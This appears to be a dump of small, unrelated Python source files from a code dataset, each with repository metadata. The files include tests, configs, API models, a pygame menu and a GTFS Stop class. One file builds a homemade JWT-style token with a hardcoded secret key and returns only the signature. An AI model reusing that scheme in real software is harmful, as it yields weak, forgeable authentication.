] | null | null | null | temp.py | Aooyh/temp_pro | 2cd4b5533666bf987be34d65d4ca9d6cf9094deb | [
"MIT"
] | null | null | null | name = 'yangghao'
gender = 'male'
age= 22
| 10.5 | 17 | 0.642857 | 6 | 42 | 4.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0.190476 | 42 | 3 | 18 | 14 | 0.735294 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8b223857cae3fac96a22e9c1453e910795c5c612 | 134 | py | Python | tests/test_lol_status.py | xNinjaKittyx/aioleague | 0566ba3068a865e8c9821c37285dc2c97d0c70bd | [
"MIT"
] | 1 | 2020-10-08T11:13:25.000Z | 2020-10-08T11:13:25.000Z | tests/test_lol_status.py | xNinjaKittyx/aioleague | 0566ba3068a865e8c9821c37285dc2c97d0c70bd | [
"MIT"
] | null | null | null | tests/test_lol_status.py | xNinjaKittyx/aioleague | 0566ba3068a865e8c9821c37285dc2c97d0c70bd | [
"MIT"
] | null | null | null |
import pytest
@pytest.mark.asyncio
async def test_get_shard_data(session):
    """The shard-status endpoint should respond without raising."""
    shard_data = await session.get_shard_data()
    print(shard_data)
| 14.888889 | 40 | 0.746269 | 20 | 134 | 4.75 | 0.7 | 0.168421 | 0.252632 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.164179 | 134 | 8 | 41 | 16.75 | 0.848214 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.2 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8b25bc3f119553032e415cf79f19e2a2a95242aa | 234 | py | Python | Python3/专利检索爬虫/solvecsvFUCKED.py | BillChen2K/LearningRepo | af9abda76c9d18fa237f7b199d5634bda0a13f67 | [
"MIT"
] | 11 | 2020-05-02T20:06:07.000Z | 2021-06-24T10:01:29.000Z | Python3/专利检索爬虫/solvecsvFUCKED.py | megan2019/LearningRepo | af9abda76c9d18fa237f7b199d5634bda0a13f67 | [
"MIT"
] | null | null | null | Python3/专利检索爬虫/solvecsvFUCKED.py | megan2019/LearningRepo | af9abda76c9d18fa237f7b199d5634bda0a13f67 | [
"MIT"
] | 6 | 2020-06-04T04:29:28.000Z | 2020-11-15T08:15:01.000Z | from lxml import etree
import lxml
import pickle

# NOTE(review): pickle.load executes arbitrary code from the file — acceptable
# for a locally produced crawler cache, never for untrusted input.
with open('/Users/billchen/OneDrive/Workspace/LearningRepo/Python3/专利检索爬虫/20050101_20101231_B09B_PAGE1.pickle', 'rb') as f:
    # Fix: dropped the unused `source = ''` local from the original.
    p = pickle.load(f)
    html = etree.HTML(p)
| 26 | 123 | 0.747863 | 34 | 234 | 5.058824 | 0.735294 | 0.116279 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.098522 | 0.132479 | 234 | 8 | 124 | 29.25 | 0.748768 | 0 | 0 | 0 | 0 | 0 | 0.42735 | 0.418803 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8b3db55454b5827be3e10d42c064e5be9ce66f7c | 84 | py | Python | apps/lk/apps.py | DaniilGorokhov/CaloryHelper | 6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51 | [
"MIT"
] | null | null | null | apps/lk/apps.py | DaniilGorokhov/CaloryHelper | 6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51 | [
"MIT"
] | null | null | null | apps/lk/apps.py | DaniilGorokhov/CaloryHelper | 6bf5ddce85479508b6498c3e4b2e0f4e5dd01b51 | [
"MIT"
] | 1 | 2021-02-15T17:40:23.000Z | 2021-02-15T17:40:23.000Z | from django.apps import AppConfig
class LkConfig(AppConfig):
    """Django app configuration for the personal-account ("lk") app."""

    name = 'apps.lk'
| 14 | 33 | 0.72619 | 11 | 84 | 5.545455 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.178571 | 84 | 5 | 34 | 16.8 | 0.884058 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
8c704e2d09c5de7202594d009e152f1ef9b1d0db | 901 | py | Python | kde/kdesdk/kcachegrind/kcachegrind.py | wrobelda/craft-blueprints-kde | 366f460cecd5baebdf3a695696767c8c0e5e7c7e | [
"BSD-2-Clause"
] | 14 | 2017-09-04T09:01:03.000Z | 2022-01-04T20:09:00.000Z | kde/kdesdk/kcachegrind/kcachegrind.py | wrobelda/craft-blueprints-kde | 366f460cecd5baebdf3a695696767c8c0e5e7c7e | [
"BSD-2-Clause"
] | 14 | 2017-12-15T08:11:22.000Z | 2020-12-29T19:11:13.000Z | kde/kdesdk/kcachegrind/kcachegrind.py | wrobelda/craft-blueprints-kde | 366f460cecd5baebdf3a695696767c8c0e5e7c7e | [
"BSD-2-Clause"
] | 19 | 2017-09-05T19:16:21.000Z | 2020-10-18T12:46:06.000Z | import info
class subinfo(info.infoclass):
    """Craft blueprint metadata for the KCachegrind profiler GUI."""

    def setTargets(self):
        """Declare buildable targets and the package description."""
        self.versionInfo.setDefaultValues()
        self.description = "GUI to profilers such as Valgrind"
        self.defaultTarget = 'master'

    def setDependencies(self):
        """Declare runtime dependencies: Qt base plus the KDE frameworks used."""
        runtime_deps = (
            "libs/qt5/qtbase",
            "kde/frameworks/tier1/karchive",
            "kde/frameworks/tier1/kcoreaddons",
            "kde/frameworks/tier2/kdoctools",
            "kde/frameworks/tier1/kwidgetsaddons",
            "kde/frameworks/tier3/kxmlgui",
            "kde/frameworks/tier4/kdelibs4support",
        )
        for dep in runtime_deps:
            self.runtimeDependencies[dep] = None
from Package.CMakePackageBase import *
class Package(CMakePackageBase):
    """Standard CMake-driven craft package; no blueprint-specific overrides."""

    def __init__(self):
        # Delegate straight to the CMake base-package setup.
        CMakePackageBase.__init__(self)
| 34.653846 | 79 | 0.720311 | 87 | 901 | 7.367816 | 0.471264 | 0.25117 | 0.25273 | 0.280811 | 0.397816 | 0.210608 | 0 | 0 | 0 | 0 | 0 | 0.010753 | 0.174251 | 901 | 25 | 80 | 36.04 | 0.850806 | 0 | 0 | 0 | 0 | 0 | 0.27081 | 0.210877 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.111111 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8c8a3fa18a644dc53d849dea29bb8a71c89d9833 | 182 | py | Python | experiments/runtests.py | MadhuNimmo/jalangi2 | bbe8350b8ede5d978c1b3923780f277aacb1d074 | [
"Apache-2.0"
] | null | null | null | experiments/runtests.py | MadhuNimmo/jalangi2 | bbe8350b8ede5d978c1b3923780f277aacb1d074 | [
"Apache-2.0"
] | null | null | null | experiments/runtests.py | MadhuNimmo/jalangi2 | bbe8350b8ede5d978c1b3923780f277aacb1d074 | [
"Apache-2.0"
] | null | null | null | from subprocess import call
def call_fail(l):
    """Run command `l` via subprocess.call; print a message and exit(1) on
    nonzero status. Returns None when the command succeeds.
    """
    if call(l) != 0:
        # Fix: the original used a Python-2 print statement, a SyntaxError on
        # Python 3; the function form is valid on both.
        print("{} failed".format(" ".join(l)))
        exit(1)
call_fail(["python", "experiments/func_test.py"])
| 18.2 | 49 | 0.598901 | 26 | 182 | 4.076923 | 0.769231 | 0.150943 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0.21978 | 182 | 9 | 50 | 20.222222 | 0.732394 | 0 | 0 | 0 | 0 | 0 | 0.21978 | 0.131868 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.166667 | null | null | 0.166667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
8cbacff4d48c09219380b49c7b56749002e1874f | 302 | py | Python | instagram_api/response/model/rewrite_rule.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | 13 | 2019-08-07T21:24:34.000Z | 2020-12-12T12:23:50.000Z | instagram_api/response/model/rewrite_rule.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null | instagram_api/response/model/rewrite_rule.py | Yuego/instagram_api | b53f72db36c505a2eb24ebac1ba8267a0cc295bb | [
"MIT"
] | null | null | null | from ..mapper import PropertyMapper, ApiInterfaceBase
from ..mapper.types import Timestamp, AnyType
__all__ = ['RewriteRule', 'RewriteRuleInterface']
class RewriteRuleInterface(ApiInterfaceBase):
    """Typed field declaration for a rewrite-rule API payload."""

    # Pattern / replacement pair — exact semantics defined upstream by the API.
    matcher: str
    replacer: str


class RewriteRule(PropertyMapper, RewriteRuleInterface):
    """Concrete property-mapper backed implementation of the interface."""

    pass
| 21.571429 | 56 | 0.784768 | 26 | 302 | 8.961538 | 0.615385 | 0.085837 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135762 | 302 | 13 | 57 | 23.230769 | 0.89272 | 0 | 0 | 0 | 0 | 0 | 0.102649 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.125 | 0.25 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 3 |
8cbf9a2f6a265e3c96cfc57e24874702176aed23 | 54 | py | Python | ScriperSol/Scriper.UnitTests/Assets/helloWord.py | gitter-badger/Scriper | cdd67687f7942916c28658fc950b49c9f3b064cd | [
"MIT"
] | null | null | null | ScriperSol/Scriper.UnitTests/Assets/helloWord.py | gitter-badger/Scriper | cdd67687f7942916c28658fc950b49c9f3b064cd | [
"MIT"
] | null | null | null | ScriperSol/Scriper.UnitTests/Assets/helloWord.py | gitter-badger/Scriper | cdd67687f7942916c28658fc950b49c9f3b064cd | [
"MIT"
] | null | null | null | print("Hello World.")
for x in range(10):
print(x) | 18 | 21 | 0.62963 | 10 | 54 | 3.4 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0.185185 | 54 | 3 | 22 | 18 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0.218182 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
8cd26494368d915f2cb7c63ef89c9c0cf97f2f81 | 341 | py | Python | tests/stl/test.py | AFlyingCar/EPYGen | 63154c3882db3d489b03abe4a47a68e436a14fad | [
"MIT"
] | null | null | null | tests/stl/test.py | AFlyingCar/EPYGen | 63154c3882db3d489b03abe4a47a68e436a14fad | [
"MIT"
] | null | null | null | tests/stl/test.py | AFlyingCar/EPYGen | 63154c3882db3d489b03abe4a47a68e436a14fad | [
"MIT"
] | null | null | null |
import STL

# Demo: print each STL container returned by the generated bindings,
# separated by a divider line.
print("===================")
stl_vec = STL.GetVector()
for element in stl_vec:
    print(element)

print("===================")
stl_map = STL.GetMap()
for element in stl_map:
    print(element)

print("===================")
stl_str = STL.GetString()
print(stl_str)

print("===================")
stl_tup = STL.GetTuple()
for element in stl_tup:
    print(element)
| 14.826087 | 28 | 0.498534 | 46 | 341 | 3.521739 | 0.304348 | 0.246914 | 0.111111 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152493 | 341 | 22 | 29 | 15.5 | 0.560554 | 0 | 0 | 0.4375 | 0 | 0 | 0.224189 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.0625 | 0 | 0.0625 | 0.5 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
8ce0b58137f5aebe3d68e56ab22824148e09f6c2 | 113 | py | Python | core/config.py | dorofeichik/FastAPI_book_store | d3a1eebff6d19f453f3b2725c76d84a0e6baf604 | [
"MIT"
] | null | null | null | core/config.py | dorofeichik/FastAPI_book_store | d3a1eebff6d19f453f3b2725c76d84a0e6baf604 | [
"MIT"
] | null | null | null | core/config.py | dorofeichik/FastAPI_book_store | d3a1eebff6d19f453f3b2725c76d84a0e6baf604 | [
"MIT"
] | null | null | null | class Settings:
PROJECT_TITLE: str = "Book store"
PROJECT_VERSION: str = "0.1.1"
settings = Settings()
| 16.142857 | 37 | 0.663717 | 15 | 113 | 4.866667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033708 | 0.212389 | 113 | 6 | 38 | 18.833333 | 0.786517 | 0 | 0 | 0 | 0 | 0 | 0.132743 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
8cf9fe75f92dbd48897b4386285e503d87e0695a | 278 | py | Python | menu.py | cosgais/Game | 9b65600e7abde92aed22e08f9a3e18e637fdb475 | [
"MIT"
] | null | null | null | menu.py | cosgais/Game | 9b65600e7abde92aed22e08f9a3e18e637fdb475 | [
"MIT"
] | null | null | null | menu.py | cosgais/Game | 9b65600e7abde92aed22e08f9a3e18e637fdb475 | [
"MIT"
] | null | null | null | import pygame
from pygame.locals import *
class Menu:
    """Minimal menu scene exposing the standard update/draw interface."""

    def __init__(self):
        # self.start = pygame.image.load('racecar.png')  # disabled in original
        pass

    def update(self, dt):
        """Per-frame update hook; the menu is static, so nothing to do."""
        pass

    def draw(self, screen):
        """Draw the menu: a single blue rectangle placeholder."""
        pygame.draw.rect(screen, (0, 0, 255), (200, 150, 100, 50))
8cfa13d804127a246f5ff929e346844b2917e76e | 716 | py | Python | myToken.py | MantouOwO/109topic | b872e9ad4ab0f07fc334de2d317172f3bb2e1002 | [
"Apache-2.0"
] | null | null | null | myToken.py | MantouOwO/109topic | b872e9ad4ab0f07fc334de2d317172f3bb2e1002 | [
"Apache-2.0"
] | null | null | null | myToken.py | MantouOwO/109topic | b872e9ad4ab0f07fc334de2d317172f3bb2e1002 | [
"Apache-2.0"
] | null | null | null | import time
import base64
import hmac
#參考資料:https://medium.com/mr-efacani-teatime/%E6%B7%BA%E8%AB%87jwt%E7%9A%84%E5%AE%89%E5%85%A8%E6%80%A7%E8%88%87%E9%81%A9%E7%94%A8%E6%83%85%E5%A2%83-301b5491b60e
secret_key = 'mantou'
def toBytes(string):
    """Encode a text string to UTF-8 bytes."""
    return string.encode('utf-8')
def encodeBase64(text):
    """URL-safe base64-encode `text` (bytes), with '=' padding stripped."""
    encoded = base64.urlsafe_b64encode(text)
    return encoded.replace(b'=', b'')
def creat_jwt(id):
    """Build a JWT-style token 'header.payload' plus an HMAC-SHA256 signature.

    `id` is interpolated into the JSON payload verbatim, so callers pass it as
    a string of digits. Returns the url-safe-base64 signature as a str.
    """
    import hashlib  # local import: needed for the explicit HS256 digest

    header = '{"alg":"HS256","typ":"JWT"}'
    payload = '{"user":' + id + ',"login_time":' + str(time.time()) + '}'
    # jwt = base64(header) . base64(payload)
    jwt = encodeBase64(toBytes(header)) + toBytes('.') + encodeBase64(toBytes(payload))
    # Bug fix: hmac.new() without digestmod raises TypeError on Python >= 3.8
    # (and defaulted to MD5 before), contradicting the "HS256" header.
    hs256 = hmac.new(toBytes(secret_key), jwt, digestmod=hashlib.sha256).digest()
    return encodeBase64(hs256).decode("utf-8")
| 28.64 | 159 | 0.666201 | 111 | 716 | 4.252252 | 0.594595 | 0.016949 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.120827 | 0.121508 | 716 | 24 | 160 | 29.833333 | 0.629571 | 0.248603 | 0 | 0 | 0 | 0 | 0.127341 | 0.050562 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.214286 | 0.142857 | 0.642857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 3 |
50674381b46a1c8f20d043b2be20542b2da87756 | 7,396 | py | Python | aequilibrae/transit/gtfs/stop.py | Art-Ev/aequilibrae | 9f438278e09c875717779bfcc99bf7ba75ed1372 | [
"MIT"
] | 82 | 2018-07-18T09:58:21.000Z | 2022-03-30T15:36:25.000Z | aequilibrae/transit/gtfs/stop.py | Art-Ev/aequilibrae | 9f438278e09c875717779bfcc99bf7ba75ed1372 | [
"MIT"
] | 197 | 2018-06-30T07:01:46.000Z | 2022-03-30T06:30:43.000Z | aequilibrae/transit/gtfs/stop.py | Art-Ev/aequilibrae | 9f438278e09c875717779bfcc99bf7ba75ed1372 | [
"MIT"
] | 29 | 2018-07-16T18:10:39.000Z | 2022-03-30T15:36:26.000Z | class Stop:
"""
Represents each one of the physical stops in a GTFS dataset (from https://developers.google.com/transit/gtfs/reference/)
Fields
______
* **id** `(stop_id)` **Required** - The stop_id field contains an ID that uniquely identifies a stop, station, or station entrance. Multiple routes may use the same stop. The stop_id is used by systems as an internal identifier of this record (e.g., primary key in database), and therefore the stop_id must be dataset unique.
* **code** `(stop_code)` **Optional** - The stop_code field contains short text or a number that uniquely identifies the stop for passengers. Stop codes are often used in phone-based transit information systems or printed on stop signage to make it easier for riders to get a stop schedule or real-time arrival information for a particular stop. The stop_code field contains short text or a number that uniquely identifies the stop for passengers. The stop_code can be the same as stop_id if it is passenger-facing. This field should be left blank for stops without a code presented to passengers.
* **name** `(stop_name)` **Required** - The stop_name field contains the name of a stop, station, or station entrance. Please use a name that people will understand in the local and tourist vernacular.
* **desc** `(stop_desc)` **Optional** - The stop_desc field contains a description of a stop. Please provide useful, quality information. Do not simply duplicate the name of the stop.
* **lat** `(stop_lat)` **Required** - The stop_lat field contains the latitude of a stop, station, or station entrance. The field value must be a valid WGS 84 latitude.
* **lon** `(stop_lon)` **Required** - The stop_lon field contains the longitude of a stop, station, or station entrance. The field value must be a valid WGS 84 longitude value from -180 to 180.
* **zone_id** `(zone_id)` **Optional** - The zone_id field defines the fare zone for a stop ID. Zone IDs are required if you want to provide fare information using fare_rules.txt. If this stop ID represents a station, the zone ID is ignored.
* **url** `(stop_url)` **Optional** - The stop_url field contains the URL of a web page about a particular stop. This should be different from the agency_url and the route_url fields. The value must be a fully qualified URL that includes http:// or https://, and any special characters in the URL must be correctly escaped. See http://www.w3.org/Addressing/URL/4_URI_Recommentations.html for a description of how to create fully qualified URL values.
* **location_type** `(location_type)` **Optional** - The location_type field identifies whether this stop ID represents a stop, station, or station entrance. If no location type is specified, or the location_type is blank, stop IDs are treated as stops. Stations may have different properties from stops when they are represented on a map or used in trip planning. The location type field can have the following values:
- 0 or blank - Stop. A location where passengers board or disembark from a transit vehicle.
- 1 - Station. A physical structure or area that contains one or more stop.
- 2 - Station Entrance/Exit. A location where passengers can enter or exit a station from the street. The stop entry must also specify a parent_station value referencing the stop ID of the parent station for the entrance.
* **parent_station** `(parent_station)` **Optional** - For stops that are physically located inside stations, the parent_station field identifies the station associated with the stop. To use this field, stops.txt must also contain a row where this stop ID is assigned location type=1.
This stop ID represents... This entry's location type... This entry's parent_station field contains...
A stop located inside a station. 0 or blank The stop ID of the station where this stop is located. The stop referenced by parent_station must have location_type=1.
A stop located outside a station. 0 or blank A blank value. The parent_station field doesn't apply to this stop.
A station. 1 A blank value. Stations can't contain other stations.
* **timezone** `(stop_timezone)` **Optional** - The stop_timezone field contains the timezone in which this stop, station, or station entrance is located. Please refer to Wikipedia List of Timezones for a list of valid values. If omitted, the stop should be assumed to be located in the timezone specified by agency_timezone in agency.txt. When a stop has a parent station, the stop is considered to be in the timezone specified by the parent station's stop_timezone value. If the parent has no stop_timezone value, the stops that belong to that station are assumed to be in the timezone specified by agency_timezone, even if the stops have their own stop_timezone values. In other words, if a given stop has a parent_station value, any stop_timezone value specified for that stop must be ignored. Even if stop_timezone values are provided in stops.txt, the times in stop_times.txt should continue to be specified as time since midnight in the timezone specified by agency_timezone in agency.txt. This ensures that the time values in a trip always increase over the course of a trip, regardless of which timezones the trip crosses.
* **wheelchair_boarding** `(wheelchair_boarding)` **Optional** - The wheelchair_boarding field identifies whether wheelchair boardings are possible from the specified stop, station, or station entrance. The field can have the following values:
- 0 (or empty) - indicates that there is no accessibility information for the stop
- 1 - indicates that at least some vehicles at this stop can be boarded by a rider in a wheelchair
- 2 - wheelchair boarding is not possible at this stop
When a stop is part of a larger station complex, as indicated by a stop with a parent_station value, the stop's wheelchair_boarding field has the following additional semantics:
- 0 (or empty) - the stop will inherit its wheelchair_boarding value from the parent station, if specified in the parent
- 1 - there exists some accessible path from outside the station to the specific stop / platform
- 2 - there exists no accessible path from outside the station to the specific stop / platform
For station entrances, the wheelchair_boarding field has the following additional semantics:
- 0 (or empty) - the station entrance will inherit its wheelchair_boarding value from the parent station, if specified in the parent
- 1 - the station entrance is wheelchair accessible (e.g. an elevator is available to platforms if they are not at-grade)
- 2 - there exists no accessible path from the entrance to station platforms
"""
def __init__(self):
"""
Initializes the class with members corresponding to all fields in the GTFS specification. See Stop class
documentation
"""
self.id = None
self.code = ""
self.name = None
self.desc = ""
self.lat = None
self.lon = None
self.zone_id = None
self.url = None
self.location_type = 0
self.parent_station = None
self.timezone = None
self.wheelchair_boarding = 0
| 104.169014 | 1,135 | 0.73729 | 1,155 | 7,396 | 4.658009 | 0.238095 | 0.032528 | 0.016915 | 0.026022 | 0.237361 | 0.205576 | 0.194796 | 0.16171 | 0.149442 | 0.149442 | 0 | 0.005295 | 0.208356 | 7,396 | 70 | 1,136 | 105.657143 | 0.913578 | 0.92861 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
50810014044e376cd798e0b655725ed6b38c7100 | 513 | py | Python | peas/tests/serial_handlers/__init__.py | zacharyt20/POCS | 8f785eaf27178be7d72106cb82e5400a8b852ba8 | [
"MIT"
] | 1 | 2019-07-19T10:37:08.000Z | 2019-07-19T10:37:08.000Z | peas/tests/serial_handlers/__init__.py | zacharyt20/POCS | 8f785eaf27178be7d72106cb82e5400a8b852ba8 | [
"MIT"
] | null | null | null | peas/tests/serial_handlers/__init__.py | zacharyt20/POCS | 8f785eaf27178be7d72106cb82e5400a8b852ba8 | [
"MIT"
] | null | null | null | """The protocol_*.py files in this package are based on PySerial's file
test/handlers/protocol_test.py, modified for different behaviors. The call
serial.serial_for_url("XYZ://") looks for a class Serial in a file named protocol_XYZ.py in this
package (i.e. directory).
This package init file will be loaded as part of searching for a protocol handler in this package.
It is important to use root-relative imports (e.g. relative to the POCS directory) so that all
modules and packages are loaded only once.
"""
| 51.3 | 98 | 0.779727 | 90 | 513 | 4.388889 | 0.633333 | 0.111392 | 0.098734 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.152047 | 513 | 9 | 99 | 57 | 0.908046 | 0.984405 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
5099f9429d6aaec98c0839fa882d53d23aca776a | 198 | py | Python | annotation_pipline/get_plaintext.py | d-e-h-i-o/bachelor_thesis | 64bc5fb2c65621f7a8265bade0328d3f8c950ff3 | [
"MIT"
] | 1 | 2021-12-20T12:56:32.000Z | 2021-12-20T12:56:32.000Z | annotation_pipline/get_plaintext.py | DFKI-NLP/covid19-law-matching | c704a926977ef5f7fd4867125a2e79f352efd163 | [
"MIT"
] | null | null | null | annotation_pipline/get_plaintext.py | DFKI-NLP/covid19-law-matching | c704a926977ef5f7fd4867125a2e79f352efd163 | [
"MIT"
] | 1 | 2021-11-24T11:21:33.000Z | 2021-11-24T11:21:33.000Z | from newsplease import NewsPlease
from retry import retry
@retry(tries=3, delay=2)
def fetch_plaintext(url: str) -> str:
    """Download `url` with news-please and return its main text ('' if absent)."""
    parsed = NewsPlease.from_url(url)
    return parsed.maintext or ""
| 18 | 38 | 0.732323 | 28 | 198 | 5.107143 | 0.607143 | 0.195804 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.171717 | 198 | 10 | 39 | 19.8 | 0.859756 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
50b0514371c1dbff0f0ec3521d33eb97209177c7 | 83 | py | Python | paths.py | yonlif/CitySimulator | ca0d0de41cc37ef17f22af2c1a329319d2dbbeb2 | [
"Apache-2.0"
] | null | null | null | paths.py | yonlif/CitySimulator | ca0d0de41cc37ef17f22af2c1a329319d2dbbeb2 | [
"Apache-2.0"
] | null | null | null | paths.py | yonlif/CitySimulator | ca0d0de41cc37ef17f22af2c1a329319d2dbbeb2 | [
"Apache-2.0"
] | null | null | null | from pathlib import Path
NYC_DATA_PATH = Path('data') / 'CSCL_PUB_Centerline.csv'
